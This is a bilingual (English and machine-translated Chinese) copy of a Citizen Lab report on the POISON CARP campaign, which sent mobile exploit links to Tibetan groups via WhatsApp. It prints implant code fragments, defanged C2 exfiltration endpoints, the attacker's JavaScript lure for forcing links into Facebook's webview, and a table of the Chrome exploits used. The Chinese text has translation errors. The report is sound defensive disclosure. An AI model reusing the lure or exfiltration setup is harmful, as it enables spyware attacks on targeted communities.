Missing Link


Tibetan Groups Targeted with 1-Click Mobile Exploits

作者:Bill Marczak,Adam Hulcoop,Etienne Maynier,Bahr Abdul Razzak,Masashi Crete-Nishihata,John Scott-Railton,and Ron Deibert

By Bill Marczak, Adam Hulcoop, Etienne Maynier, Bahr Abdul Razzak, Masashi Crete-Nishihata, John Scott-Railton, and Ron Deibert


September 24, 2019


Key Findings



西藏社区已经被数字间谍活动包围了十多年。2009年,《信息战监测》发表了追踪鬼网的报告,详细描述了一个针对西藏组织的恶意软件操作,包括在 Dharamsala 的达赖喇嘛私人办公室,以及在103个国家的政府机构。当时很少有公开报道有针对性的恶意软件攻击,关于这些威胁如何影响民间社会的文件也很有限。

The Tibetan community has been besieged by digital espionage for over a decade. In 2009, the Information Warfare Monitor published the report Tracking GhostNet, detailing a targeted malware operation that spied on Tibetan organisations including the Private Office of His Holiness the Dalai Lama in Dharamsala, India, as well as government offices in 103 countries. At the time there were very few public reports of targeted malware campaigns and limited documentation of how these threats affected civil society.

在过去的十年里,GhostNet 使用的策略已经为西藏人所熟悉:充满旧漏洞的电子邮件被用来向未打补丁的电脑传送定制的恶意软件。通常,这些操作中使用的恶意软件针对的是 Windows 系统,一些罕见的恶意软件针对 MacOS 和 Android 系统。这些间谍活动有一个共同点,那就是关注巧妙的社会工程,而不是利用或恶意软件的技术复杂性。

Over the past ten years, the tactics used in GhostNet have become familiar to Tibetans: emails laden with older exploits used to deliver custom malware to unpatched computers. Typically, the malware used in these operations target Windows systems, with some rare incidents of malware targeting MacOS and Android. A common thread between these espionage campaigns is a focus on clever social engineering rather than the technical sophistication of exploits or malware.

虽然这些模式很常见,但我们观察到战术的转变似乎与社区防御姿态的变化有关。从历史上看,恶意软件以电子邮件附件的形式发送是藏族群体经历的最常见的威胁。作为回应,社区中的团体发起了一场提高用户意识的运动,建议使用云平台,如 Google Drive 或 DropBox,来分享文档以替代电子邮件附件。渐渐地,我们观察到针对藏族群体的恶意软件攻击有所减少,凭证式钓鱼有所增加,这表明操作者正在改变他们的应对策略。最近,我们还观察到恶意 OAuth 应用程序的攻击,可能是为了绕过在谷歌账户上使用双重身份验证的用户。这些变化表明了藏人组织的数字防御和针对他们的操作者的能力之间的内在不对称:改变一个社区的行为是一个缓慢而渐进的过程,而对手可以在一夜之间发展。

While these patterns are common, we have observed shifts in tactics seemingly tied to changes in the defensive posture of the community. Historically, malware sent as email attachments was the most common threat Tibetan groups experienced. In response, groups in the community promoted a user awareness campaign that advised the use of cloud platforms, such as Google Drive or DropBox, to share documents as an alternative to email attachments. Gradually, we observed a drop in malware campaigns against Tibetan groups and a rise in credential phishing, suggesting that operators were changing their tactics in response. Recently, we have also observed campaigns using malicious OAuth applications, potentially in an effort to bypass users who are using two-factor authentication on their Google accounts. These changes demonstrate an inherent asymmetry between the digital defenses of Tibetan groups and the capabilities of the operators who target them: changing the behaviour of a community is a slow and gradual process, while an adversary can evolve overnight.

为了应对这些挑战,藏人组织最近成立了西藏计算机应急小组(TibCERT),这是一个由藏人组织组成的联盟,旨在通过事件响应协作和数据共享来改善数字安全。2018年11月,TibCERT 收到了 WhatsApp 发送给西藏组织高级成员的可疑信息。在目标群体的同意下,TibCERT 与 Citizen 实验室共享了这些信息的样本。我们的分析发现,这些信息包含了旨在利用 iPhone 和 Android 设备安装间谍软件的链接。这个活动似乎是由一个单一的操作员,我们称为毒鲤。这次活动是第一次记录在案的针对藏族群体的一键式移动攻击。与我们通常观察到的用来对付藏族社区的手段相比,它代表了社会工程策略和技术复杂性的显著升级。

To address these challenges, Tibetan groups have recently formed the Tibetan Computer Emergency Readiness Team (TibCERT), a coalition between Tibetan organisations to improve digital security through incident response collaboration and data sharing. In November 2018, TibCERT was notified of suspicious WhatsApp messages sent to senior members of Tibetan groups. With the consent of the targeted groups, TibCERT shared samples of these messages with Citizen Lab. Our analysis found that the messages included links designed to exploit and install spyware on iPhone and Android devices. The campaign appears to be carried out by a single operator that we call POISON CARP. The campaign is the first documented case of one-click mobile exploits used to target Tibetan groups. It represents a significant escalation in social engineering tactics and technical sophistication compared to what we typically have observed being used against the Tibetan community.

从2018年11月到2019年9月,我们收集了一个 iOS 漏洞链,一个 iOS 间谍软件植入,八个不同的安卓漏洞,以及一个安卓间谍软件包。Ios 漏洞链只影响11.0到11.4版本的 iOS 版本,我们观察到它并不是零日漏洞。安卓漏洞包括 Exodus Intelligence 公开发布的一个漏洞,这个漏洞是修补过的,但是补丁还没有发布给 Chrome 用户。其他漏洞包括腾讯宣武实验室(CVE-2016-1646)成员、奇虎360火神团队(CVE-2018-17480)成员以及 Chrome Bug 追踪器(CVE-2018-6065)上的谷歌零项目(Project Zero)成员的个人 GitHub 页面上发布的 Chrome 漏洞代码被轻微修改。

Between November 2018 and September 2019, we collected one iOS exploit chain, one iOS spyware implant, eight distinct Android exploits, and an Android spyware package. The iOS exploit chain only affects iOS versions between 11.0 and 11.4, and was not a zero-day exploit when we observed it. The Android exploits include a working exploit publicly released by Exodus Intelligence for a Google Chrome bug that was patched, but whose patch had not yet been distributed to Chrome users. Other exploits include what appears to be lightly modified versions of Chrome exploit code published on the personal GitHub pages of a member of Tencent’s Xuanwu Lab (CVE-2016-1646), a member of Qihoo 360’s Vulcan Team (CVE-2018-17480), and by a Google Project Zero member on the Chrome Bug Tracker (CVE-2018-6065).

Poison CARP 使用的漏洞、间谍软件和基础设施将它与最近报道的两个针对维吾尔族团体的数字间谍活动联系起来。2019年8月,谷歌零计划(Google Project Zero)报道了谷歌威胁分析小组(Google's Threat Analysis Group)发现的一场数字间谍活动,该活动利用受到攻击的网站向访问者提供 iOS 漏洞(其中一个案例中的零日漏洞),目的是让他们的 iphone 受到间谍软。随后的媒体报道援引匿名消息人士的话说,这场运动针对的是维吾尔族社区,同样的网站也被用来服务 Android 和 Windows 恶意软件。在这些报道之后,Volexity 公布了一个针对维吾尔族人的数字间谍活动的细节,这个活动利用被入侵的网站用 Android 恶意软件感染目标。虽然 Volexity 没有提供任何与谷歌报告重叠的技术指标,但他们推测,在这两种情况下,操作者可能是相同的。我们的报告提供了这些缺失的环节。

The exploits, spyware, and infrastructure used by POISON CARP link it to two recently reported digital espionage campaigns targeting Uyghur groups. In August 2019, Google Project Zero reported on a digital espionage campaign identified by Google’s Threat Analysis Group that used compromised websites to serve iOS exploits (including a zero-day in one case) to visitors for the purpose of infecting their iPhones with spyware. Subsequent media reporting cited anonymous sources who stated that the campaign targeted the Uyghur community and that the same websites were being used to serve Android and Windows malware.1 Following these reports, Volexity published details of a digital espionage campaign against Uyghurs that used compromised websites to infect targets with Android malware. While Volexity did not provide any technical indicators that overlap with Google’s report, they speculated that the operator may be the same in both cases. Our report provides these missing links.

Poison CARP 使用了 Google Project Zero 报告中确定的 iOS 漏洞链,并使用了一个间谍软件,这个间谍软件似乎是 Google 描述的植入样本的早期版本。毒鲤使用了域 msap [ . ] 服务的 iOS 漏洞,一个指标,Volexity 的报告发现在代码的一个受损的维吾尔网站。基于这些相似之处,这些活动很可能是由同一家运营商或协同运营商组织的,这些运营商对被视为中国安全利益敏感的乙炔少数群体的活动感兴趣。

POISON CARP used an iOS exploit chain identified in the Google Project Zero report, and used spyware that appears to be an earlier version of the implant sample described by Google. POISON CARP used the domain msap[.]services to serve the iOS exploit, an indicator that Volexity’s report found in the code of a compromised Uyghur website. Based on these similarities, it is likely the campaigns were conducted by the same operator, or a coordinated group of operators, who have an interest in the activities of ethinic minority groups that are considered sensitive in the context of China’s security interests.


The report proceeds as follows:

1. 瞄准目标

1. Targeting


Between November 11-14, 2018, we observed 15 intrusion attempts against individuals from the Private Office of His Holiness the Dalai Lama, the Central Tibetan Administration, the Tibetan Parliament, and Tibetan human rights groups. On April 22 and May 21 2019, we observed two additional attempts. The majority of people who were targeted hold senior positions in their respective organizations.

这些入侵企图是通过 WhatsApp 上的七条假人物信息来实现的,这些假人物被设计成记者、国际倡导组织的工作人员、西藏人权组织的志愿者以及前往印度的游客。这个假冒的人物角色只使用带有香港国家代码(+ 852)的 WhatsApp 电话号码。

The intrusion attempts arrived via WhatsApp messages from seven fake personas designed to appear as journalists, staff at international advocacy organisations, volunteers to Tibetan human rights groups, and tourists to India. The fake personas exclusively used WhatsApp phone numbers with Hong Kong country codes (+852).

在整个活动中,POISON CARP 展示了在社会工程方面的重大努力。这些人物角色和信息是针对目标定制的,POISON CARP 操作员积极参与对话并持续试图感染目标。总的来说,这个诡计很有说服力:在15次入侵企图中,有8次被入侵者回想起点击了攻击链接。幸运的是,所有这些人都运行着 iOS 或 Android 的非易受攻击版本,没有受到感染。

Throughout the campaign, POISON CARP demonstrated significant effort in social engineering. The personas and messages were tailored to the targets, and POISON CARP operators actively engaged in conversations and persistently attempted to infect targets. Overall, the ruse was persuasive: in eight of the 15 intrusion attempts, the targeted persons recall clicking the exploit link. Fortunately, all of these individuals were running non-vulnerable versions of iOS or Android, and were not infected.


A Fake Amnesty International Researcher

2018年11月13日,西藏人权组织的一名高级工作人员在 WhatsApp 上接到了一个之前未知号码的联系。这个人声称自己是国际特赦组织香港分部的难民组组长 Jason Wu。国际特赦组织目前似乎没有任何「Jason Wu」雇员。

On November 13, 2018, a senior staff member at a Tibetan human rights group was contacted on WhatsApp from a previously unknown number. The persona claimed to be “Jason Wu,” head of the “Refugee Group” at Amnesty International’s Hong Kong branch. There does not appear to be any “Jason Wu” currently employed by Amnesty International.


Figure 1: A social engineering attempt on November 13, 2018 shows the level of effort put into crafting a plausible deception.

一旦目标回复(图1),这个人物迅速引入了最近在西藏发生的自焚事件的话题,并声称试图核实社交媒体的报道,以便用于即将发布的国际特赦组织关于中国人权状况的报告,以及即将发布的批评中国政府对待少数民族的声明。一旦托辞建立,操作员就会共享一个用 bit.ly 缩短的链接。链接重定向到 www.msap [ . ]上的一个页面 包含一个针对11.0到11.4版本的 iOS 漏洞链的服务。

Once the target replied (Figure 1), the persona quickly introduced the topic of a recent self-immolation in Tibet and claimed to be attempting to verify social media reports for use in an upcoming Amnesty International report on human rights in China, and for an upcoming statement critical of the Chinese government’s treatment of ethnic minorities. Once the pretext was established, the operator shared a link shortened with bit.ly. The link redirected to a page on www.msap[.]services that contained an iOS exploit chain targeted at versions 11.0 through 11.4.

目标人物回想起点击过这个链接,但没有被感染,因为他们的 iPhone 运行的是 iOS 12.0.1版本。也许是因为操作者没有观察到成功的感染,所以他们继续与目标进行对话(图2),共享额外的利用链接。几个小时后,这名人士解释说,他们已经确认了与西藏中央政府联系人有关自焚事件的消息,这可能是为了让这种互动在目标看来是友好的。

The target recalls clicking on the link, but was not infected because their iPhone was running iOS version 12.0.1. Perhaps because the operator did not observe a successful infection, they continued to converse with the target (Figure 2), sharing additional exploit links. Several hours later, the persona explained that they had confirmed information about the self-immolation with contacts at the Central Tibetan Administration, which may have been an effort to make the interaction seem benign to the target.


Figure 2: The fake “Jason Wu” persona send exploits links to a staff member of a Tibetan human rights group.

从 iOS 系统到安卓系统

From iOS to Android Exploit Attempts

在另一起入侵企图中,「梁露西」(Lucy Leung)与同一个藏人人权组织的一名工作人员取得了联系。梁露西化装成《纽约时报》记者,寻求采访。在一个简短的借口之后,这个人物向目标发送了一个 iOS 入侵尝试链接到 www.msap [ . ](图3)。

In another intrusion attempt, a staff member from the same Tibetan human rights organization was contacted by “Lucy Leung,” a persona masquerading as a New York Times reporter seeking an interview. After a brief pretext, the persona sent the target an iOS intrusion attempt linking directly to www.msap[.]services (Figure 3).

图3:在发送一个 iOS 漏洞链接(左)之后,伪造的《纽约时报》记者角色会发送一个 Android 漏洞链接(右)。

Figure 3: After sending an iOS exploit link (left), the fake New York Times reporter persona sends an Android exploit link (right).

角色坚持要求目标点击链接。目标用户点击了这个链接,但是他们并没有被感染,因为他们使用的是 Android 设备。然后用户发送了一个 Android 攻击链接,这一次是通过 bit.ly 隐藏的。

The persona persistently requested that the target click the link. The target recalls clicking on the link, but they were not infected as they were using an Android device. The persona then sent an Android exploit link, this time disguising it via bit.ly.

2. iOS 开发工具包

2. iOS Exploit Kit

在我们观察到的针对藏人目标的17次入侵尝试中,有12次包含了指向 iOS 漏洞的链接。除了一次尝试之外,所有的尝试都是在2018年11月11日至14日之间发送的,最后一次尝试是在2019年4月22日。这个漏洞链接指向了 www.msap [ . ]上看起来是唯一的短码 服务(例如,http:/ / www.msap [ . ] 服务 / zqfqzs)。链接有时是直接发送的,有时是通过网址缩写服务,比如 Bitly。

Of the 17 intrusion attempts we observed against Tibetan targets, 12 contained links to the iOS exploit. All but one of the attempts were sent between November 11-14, 2018, with the last attempt sent on April 22, 2019. The exploit links pointed to what appear to be unique shortcodes on www.msap[.]services (e.g., http://www.msap[.]services/ZQfqzs). Links were sometimes sent directly, and sometimes via URL shorteners such as Bitly.

请求在 www.msap [ . ]上托管的恶意链接 使用 iPhone User-Agent 字符串(iOS 11.0-11.4)的服务域返回一个有效的 html 页面,其中包括两个 iframe:一个全尺寸的 iframe 显示一个良性的诱骗网页,以及一个不可见的 iframe 导致一个不同网站上的利用页面。试图访问其他用户代理我们测试导致302重定向到诱饵网页。尝试访问 www.msap [ . ]上不存在的短链接 服务域名导致目标浏览器被302重定向到苹果网站。

Requesting a malicious link hosted on the www.msap[.]services domain using an iPhone User-Agent string (iOS 11.0 – 11.4) returned a valid html page including two iframes: one full-sized iframe displaying a benign decoy webpage and an invisible iframe leading to an exploit page on a different website. Attempts to visit with other user agents we tested resulted in a 302 redirect to the decoy webpage. Attempts to visit nonexistent short-links on the www.msap[.]services domain resulted in a 302 redirect of the target’s browser to apple.com.

截至2019年9月6日,Bitly 链接统计记录了 iOS 利用短链接的总点击量为140次。我们从2018年11月发送的链接中获得了一个 iOS 漏洞链。我们无法从2019年4月的链接中获得任何恶意代码。这个漏洞链似乎是针对所有 iPhone 6-x 上的 iOS 11-11.4版本设计的,尽管在测试过程中我们无法成功感染运行 iOS 11.4的 iPhone SE。第一个漏洞是 WebKit JavaScriptCore 漏洞,它导致了一个 iOS / 权限提升漏洞链的加载,最终执行了一个间谍软件的有效载荷,旨在窃取一系列应用程序和服务的数据。

As of September 6, 2019, the Bitly link statistics recorded 140 total clicks on the iOS exploit short links. We obtained a single iOS exploit chain from the links sent in November 2018. We were unable to obtain any malicious code from the April 2019 link. The exploit chain appeared to be designed to target iOS versions 11 – 11.4 on all iPhone models 6 – X, although we were unable to successfully infect an iPhone SE running iOS 11.4 during testing. The first exploit in the chain was a WebKit JavaScriptCore exploit, which resulted in the loading of an iOS privilege escalation exploit chain that ultimately executed a spyware payload designed to steal data from a range of applications and services.

我们在2018年11月发现这个漏洞后不久就向苹果报告了这个漏洞链。2018年7月,苹果公司确认了 iOS 11.4.1已经修复了浏览器和权限提升安全漏洞。在 POISON CARP 活动中使用的浏览器漏洞似乎与 Google Project Zero 报告中描述的漏洞相匹配(JSC Exploit 4,与 WebKit 问题185694相关)。苹果进一步证实,我们遇到的权限提升安全漏洞和沙盒逃逸漏洞漏洞与谷歌报告中的 iOS 漏洞链3完全相同。因此,当这个漏洞被用来对付西藏组织时,它不是一个零日,而且至少已经过时了四个月。

We reported the exploit chain to Apple shortly after discovering it in November 2018. Apple confirmed that both the browser and privilege escalation exploits had been patched as of iOS 11.4.1 in July 2018. The browser exploit used in the POISON CARP campaign appeared to match an exploit described in the Google Project Zero report (JSC Exploit 4, related to WebKit issue 185694). Apple further confirmed that the privilege escalation and sandbox escape exploit we encountered was identical to iOS Exploit Chain 3 from the Google report. Therefore, when the exploit was deployed against Tibetan groups, it was not a zero-day and was at least four months out-of-date.


Encrypted Malcode Delivery

该开发过程的一个值得注意的特点是,利用和恶意代码在目标浏览器和操作员的服务器之间使用 ECC Diffie-Hellman(ECDH)密钥交换进行了加密(图4)。该漏洞和有效载荷的加密传递将防止网络入侵预防系统 / 恶意代码检测(比如在企业设置中常用的那些代码),并防止分析人员仅从网络流量捕获中重建和分析恶意代码。当然,分析师仍然可以通过其他方式提取恶意代码,比如从内存转储或基于浏览器的工具中提取恶意代码。

One noteworthy feature of the exploitation process was that the exploits and malcode were encrypted with an ECC Diffie-Hellman (ECDH) key exchange between the target browser and the operator’s server (Figure 4). The encrypted delivery of the exploit and payload would prevent a network intrusion detection system (such as those commonly used in enterprise settings) from detecting malicious code, and prevents analysts from reconstructing and analyzing the malicious code from a network traffic capture alone. Of course, analysts can still extract the malicious code in other ways, such as from memory dumps or browser-based instrumentation.

图4:ECDH 密钥生成用于保护 iOS 恶意代码。

Figure 4 : ECDH key generation for protection of the iOS malcode.

Poison CARP 使用的加密邮件编码是基于安全研究员 Zoltan Balazs 在2017年开发的一个叫做 IronSquirrel 的项目。然而,加密的恶意代码传输在2015年首次出现在钓鱼者开发工具包中,后来又出现在其他几个工具包中。

The specific code for encrypted malcode delivery used by POISON CARP is based on a project called IronSquirrel developed by security researcher Zoltan Balazs in 2017. However, the use of encrypted malcode delivery was first seen in 2015 in the Angler Exploit Kit and later in several other kits.


Implant Analysis


The spyware implant we acquired from the exploit chain in November 2018 was similar, though not identical, to the implant described by Google Project Zero researchers. Based on the technical details provided in the Google report, we believe the two implants represent the same spyware program in different stages of development. The November 2018 version we obtained appears to represent a rudimentary stage of development: seemingly important methods that are unused, and the command and control (C2) implementation lacks even the most basic capabilities. The Implant Teardown section of the Google Project Zero report shows a fairly full-featured implant. We highlight some differences between the two samples below.



植入物的主要功能在 Service 类中实现。类 start 方法(图5)使用 startTimer 方法初始化一个计时器,以创建一个持久执行循环。

The main functionality of the implant is implemented in the Service class. The class start method (Figure 5) initialises a timer using the startTimer method to create a persistent execution loop.

图5:Service:start 方法。

Figure 5: Service:start method.

一旦完成,开始方法进行初始设备信息收集和上传到 C2服务器,然后收集和上传各种应用程序数据,包括位置数据,联系人,通话历史,短信历史,等等。

Once complete, the start method carries out initial device information collection and upload to the C2 server, followed by collection and upload of various application data including location data, contacts, call history, SMS history, and more.



谷歌零计划的研究人员分析了植入物的起始方法(我们称之为 P0版本),其结构如下:

The start method in the implant that Google Project Zero researchers analyzed (which we refer to as the P0 version) had the following structure:

-[Service start] {

[self startTimer];

[self upload];


在这个版本中,初始设备信息收集在 upload 方法中进行,使得 start 方法更加简单。0版本似乎还添加了一个数据检索方法来获取苹果邮件应用程序的内容,这在我们分析的版本中是找不到的。

In this version, the initial device information collection takes place in the upload method, making the start method much simpler. The P0 version also appears to add a data retrieval method to obtain the contents of the Apple Mail application, something which is not found in the version we analyzed.

通过 uploadDevice 方法在植入初始化过程中收集的特定设备信息包括:

The specific device information gathered during the implant initialisation, executed by the uploadDevice method, consists of:

数据收集:IMPLANT COMPARISON:data collection

IMPLANT COMPARISON: data collection

在 P0版本中,同样的设备信息是通过 uploadDevice 方法收集的,但是这个版本也收集了另外两条信息:

In the P0 version, the same device info was collected via the uploadDevice method, however this version also collected two additional pieces of information:

  • 总磁盘空间
  • Total disk space
  • 可用磁盘空间
  • Free disk space

在初始数据收集和过滤期间,移植通过 remotelist 方法联系 C2服务器,请求操作员希望从中过滤数据的应用程序列表。在没有返回列表的情况下,植入程序有一个预定义的硬编码应用程序列表,其中包括:

During initial data collection and exfiltration, the implant contacts the C2 server using the remotelist method to request a list of applications from which the operator wishes to exfiltrate data. In the case where no list is returned, the implant has a predefined list of hardcoded applications which consists of:


IMPLANT COMPARISON: targeted applications


The P0 version adds the following applications to the default list:

  • Yahoo Mail (com.yahoo.Aerogram)
  • Outlook (com.microsoft.Office.Outlook)
  • NetEase Mail Master (com.netease.mailmaster)
  • Skype (com.skype.skype)
  • Facebook (com.facebook.Facebook)
  • WeChat (com.tencent.xin)


Command and (Lack of) Control

一旦持久性计时器控制了运行循环,就会调用两个方法:status 和 capp(图6)。

Once the persistence timer takes control of the run loop, two methods are called: status and capp (Figure 6).


Figure 6: Run loop timer.

Status 方法向包含当前网络连接方法(wifi 或蜂窝)的 C2服务器发送心跳消息。知道目标是在无线网络还是蜂窝网络上对于操作员来说很重要,因为如果目标接收到提供商发出的数据超载警报,使用蜂窝网络连接窃取大量数据可能会泄露给监控人员。图7显示了 status 方法。

The status method sends a heartbeat message to the C2 server containing the current network connection method (wifi or cellular). Knowing whether the target is on wifi or cellular is important to operators, as exfiltrating large amounts of data using a cellular connection could tip off the target to the surveillance if they receive a data overage alert from their provider. Figure 7 shows the status method.

图7:Service:status 方法。

Figure 7: Service:status method.

在我们的示例中,这些数据通过(未加密的) HTTP POST 发送到位于 hxxp:/ / 66.42.58[ . . ]的 C2服务器 59:9078 / 状态。

In our sample, this data is sent via (unencrypted) HTTP POST to a C2 server at hxxp://66.42.58[.]59:9078/status.

计时器循环调用的另一个方法 capp(图8)向 C2服务器发出请求,同样使用 remotelist 方法,请求操作员希望从中过滤数据的应用程序列表。

The other method called by the timer loop, capp (Figure 8), issues a request to the C2 server, again using the remotelist method, to request a list of applications from which the operator wishes to exfiltrate data.

图8:capp 方法。

Figure 8: capp method.

Remotelist 方法通过同样未加密的 HTTP POST 调用 hxxp:/ / 66.42.58[ . . ] 59:9078 / list. 在我们的示例中,这是 C2服务器可以使用的唯一函数。

The remotelist method makes a call via HTTP POST, again unencrypted, to hxxp://66.42.58[.]59:9078/list. In our sample, this is the only function that the C2 server can utilise.


IMPLANT COMPARISON: command and control

在 P0版本的移植中,定时器句柄方法具有类似的结构,但是 capp 方法被重命名为 cmds:

In the P0 version of the implant, the timer_handle method has a similar structure, however the capp method is renamed to cmds:

-[Service cmds] {


[self remotelist];



P0版本的 remotelist 方法得到了显著改进,并且能够解析和处理来自命令和控制服务器的各种命令:

The P0 version of the remotelist method is significantly improved, and able to parse and handle a variety of commands from the command and control server:


data_obj = [json objectForKey:@"data"];

NSLog(@"data Result: %@", data_obj);

cmds_obj = [data_obj objectForKey:@"cmds"];

NSLog(@"cmds: %@", cmds_obj);

for (cmd in cmds_obj) {

[self doCommand:cmd];


P0版本将接收到的命令传递给 doCommand 方法,doCommand 方法根据恶意软件操作员选择的选项,最终负责分派各种数据收集和过滤方法。Google Project Zero 报告中记录了操作员可以使用的完整命令列表。

The P0 version passes received commands to the doCommand method, which is ultimately responsible for dispatching various data collection and exfiltration methods depending on the options chosen by the malware operator. A complete list of the commands available to the operator are documented in the Google Project Zero report.



由于 C2服务器通信能力的缺乏,我们怀疑我们观察到的植入处于初步的开发状态。有许多方法出现,无论是在名称和功能,已经设计捕获和出口特定的设备和应用程序数据。虽然它们通过 start 方法在植入的初始执行时被调用,但它们不会通过来自 C2服务器的任何交互再次被调用。此外,还有许多名字有暗示意义的工具方法从未被调用过:

We suspect that the implant we observed is in a rudimentary state of development, due to the seeming lack of C2 server communication capabilities. There are numerous methods which appear, both in name and function, to have been designed to capture and exfiltrate specific device and application data. While they are called on the initial execution of the implant via the start method, they are not called again via any interaction from the C2 server. Additionally, there are numerous utility methods with suggestive names that are never invoked:

考虑到 Google Project Zero 团队分析的移植版本的增强功能,我们强烈怀疑移植的副本代表了开发的早期阶段。

Given the enhancements in the implant version analyzed by the Google Project Zero team, we strongly suspect that our copy of the implant represents an earlier stage of development.

3. MOONSHINE:Android 开发套件和有效载荷

3. MOONSHINE: Android Exploit Kit and Payload

在整个行动过程中,POISON CARP 通过 WhatsApp 向目标发送了四个指向安卓系统的恶意链接。虽然我们没有确定 iOS 和 Android 的开发或有效负载之间的任何共享基础设施或代码相似性,但很明显 POISON CARP 同时使用了这两个工具(图3)。我们将 Android 开发和恶意软件工具包称为 MOONSHINE,给出了开发者包含的一些与酒精相关的字符串。这个工具包在本报告之前没有公开描述过。

During the course of the campaign, POISON CARP sent targets four malicious links pointing to Android exploits via WhatsApp. While we did not identify any shared infrastructure or code similarities between the iOS and Android exploits or payloads, it is clear that POISON CARP was using both tools (Figure 3). We refer to the Android exploit and malware kit as MOONSHINE, given a number of Alcohol-related strings included by the developer. This kit has not been publicly described previous to this report.

Android 攻击链接是以下形式的链接,其中[ MoonshineSite ]是一个运行 MOONSHINE 的服务器的 IP 地址或域名,[ URL ]是一个 base64编码的诱饵 URL,用户被重定向后攻击,或者攻击失败:

The Android exploit links were links of the following form, where [MoonshineSite] was an IP address or domain name of a server running MOONSHINE, and [URL] was a Base64-encoded decoy URL where the user was redirected post-exploitation, or if exploitation failed:


如果目标使用基于 chrome 的 Android 浏览器访问该链接,他们会收到一个带有图9所示代码的网页,该代码旨在强制他们的设备打开 Facebook 应用程序内置的基于 chrome 的网页浏览器中的利用 URL。

If a target accessed the link using a Chrome-based Android browser, they received a webpage with the code in Figure 9, designed to coerce their device to open the exploit URL inside the Facebook app’s built-in Chrome-based web browser.

<script src="show.aspx?name=https%3A%2F%2Fcdn.bootcss.com%2Fjquery%2F3.2.1%2Fjquery.min.js"></script>

<script type="text/javascript">


function clicksp(){



function jump(){



setTimeout(clicksp, 200);

setTimeout(jump, 1000);



<a href="show.aspx?name=http%3A%2F%2F111.254.15.194%2F%e5%9b%be%e4%b9%a6%2F%e4%b8%80%e9%94%ae%e5%bc%8f%e7%a7%bb%e5%8a%a8%e6%94%bb%e5%87%bb%e7%9a%84%e8%97%8f%e4%ba%ba%e7%9b%ae%e6%a0%87%e7%be%a4%e4%bd%93%2Ffb%3A%2F%2Fwebview%2F%3Furl=http%3A%2F%2F[MoonshineSite]%3A5000%2Fweb%2Finfo%3Forg=[URL]">

<span id="sp"></span></a>

图9:JavaScript 试图强制在 Facebook 应用程序中打开 URL。

Figure 9: JavaScript attempts to force the URL to be opened in the Facebook app.

当使用 Android Facebook 用户代理标题打开攻击 URL 时,MOONSHINE 检查了标题,看看 Chrome 版本是否容易受到八种不同的 Chrome 攻击之一(表1),这些攻击都在最新的 Chrome 版本中得到了修复。4个 MOONSHINE 漏洞显然是从安全研究人员在 bug 追踪器或 GitHub 页面上发布的工作利用代码中复制的。与 iOS 开发体系结构相反,Android 开发和有效负载传递没有使用 ECDH 密钥(甚至 HTTPS)进行加密。

When the exploit URL was opened with an Android Facebook User-Agent header, MOONSHINE checked the header to see if the Chrome version was vulnerable to one of eight different Chrome exploits (Table 1), which are all fixed in the latest Chrome version. Four of the MOONSHINE exploits are clearly copied from working exploit code posted by security researchers on bug trackers or GitHub pages. In contrast to the iOS exploit architecture, the Android exploit and payload delivery was not encrypted with ECDH keys (or even HTTPS).

请求中的用户代理 User Agent in Request 剥削归还 Exploit Returned
38 Chrome < 38 (无) (None)
Chrome 39-40 Chrome 39 – 40 漏洞1:似乎包括一个 CVE-2016-1646漏洞,该漏洞发布在凯康腾讯宣武实验室 Github 帐户(@4B5F5F4B)上。 Exploit #1: Appears to include a CVE-2016-1646 exploit published on Kai Kang’s Github account (@4B5F5F4B) of Tencent’s Xuanwu Lab.2
41 Chrome 41 (无) (None)
Chrome 42-49 Chrome 42 – 49 开发 # 1 Exploit #1
50 Chrome 50 漏洞2:看起来是 CVE-2016-5198,这个漏洞通过趋势科技的零日倡议被公开归功于腾讯锐意安全实验室,并在 Chrome 54.0.2840.87中得到修复。这里使用的特定漏洞的作者是未知的,尽管有大量的代码与漏洞 # 1重叠。 Exploit #2: Appears to be CVE-2016-5198, a bug publicly credited to Tencent’s Keen Security Lab via Trend Micro’s Zero Day Initiative and fixed in Chrome 54.0.2840.87. The author of the specific exploit used here is unknown, though there is substantial code overlap with Exploit #1.
Chrome 51-55 Chrome 51 – 55 漏洞3:看起来像是 CVE-2017-5030,这个漏洞公开归功于安全研究员 Brendon Tiszka。这里使用的具体漏洞的作者是未知的。 Exploit #3: Appears to be CVE-2017-5030, a bug publicly credited to security researcher Brendon Tiszka. The author of the specific exploit used here is unknown.
Chrome 56-58 Chrome 56 – 58 漏洞4:似乎包括奇虎360火神团队的 CVE-2017-5070漏洞,该漏洞发布在赵的 Github 账号(@s0rrymybad)上。 Exploit #4: Appears to include a CVE-2017-5070 exploit published on Qixun Zhao’s Github account (@S0rryMybad) of Qihoo 360’s Vulcan Team.
Chrome 59-61 Chrome 59 – 61 (无) (None)
Chrome 62-63 Chrome 62 – 63 漏洞5:似乎包括一个 CVE-2018-6065漏洞利用发布在谷歌 Chrome bug 跟踪器由马克布兰德谷歌项目零。 Exploit #5: Appears to include a CVE-2018-6065 exploit published on the Google Chrome bug tracker by Mark Brand of Google Project Zero.
Chrome 64-67 Chrome 64 – 67 (无) (None)
Chrome 68-69 Chrome 68 – 69 漏洞6:似乎是 CVE-2018-17463,一个公开归功于安全研究员 Samuel gro 的漏洞。这里使用的具体漏洞的作者是未知的。 Exploit #6: Appears to be CVE-2018-17463, a bug publicly credited to security researcher Samuel Groß. The author of the specific exploit used here is unknown.
70 Chrome 70 漏洞7:似乎是 CVE-2018-17480,一个漏洞成功利用在天府杯 PWN 竞赛。这个漏洞归功于奇虎360阿尔法团队的 guangong(@oldfresher),不过这里使用的具体漏洞的作者尚不清楚。 Exploit #7: Appears to be CVE-2018-17480, a bug successfully exploited at the Tian Fu Cup PWN Contest. The bug is credited to Guang Gong (@oldfresher) of Qihoo 360’s Alpha Team, though the author of the specific exploit used here is unknown.
Chrome 71-73 Chrome 71-73 漏洞8:似乎是 CVE-2019-5825,这是腾讯基恩安全实验室的几名研究人员公开发现的一个漏洞。这里使用的漏洞是 Exodus Intelligence 在检查了 Chrome 的 JavaScript 引擎的 git 日志后编写并发布的,他们发现了一个漏洞,这个漏洞已经在源代码中修复了,但是它的补丁还没有发布给 Chrome 用户。 Exploit #8: Appears to be CVE-2019-5825, a bug publicly credited to several researchers at Tencent’s Keen Security Lab. The specific exploit used here was written and published by Exodus Intelligence after they examined the git log for Chrome’s JavaScript engine, and found a vulnerability that had been fixed in source code, but whose patch had not yet shipped to Chrome users.

表1:MOONSHINE 中使用的 Chrome 漏洞

Table 1: Chrome Exploits used in MOONSHINE

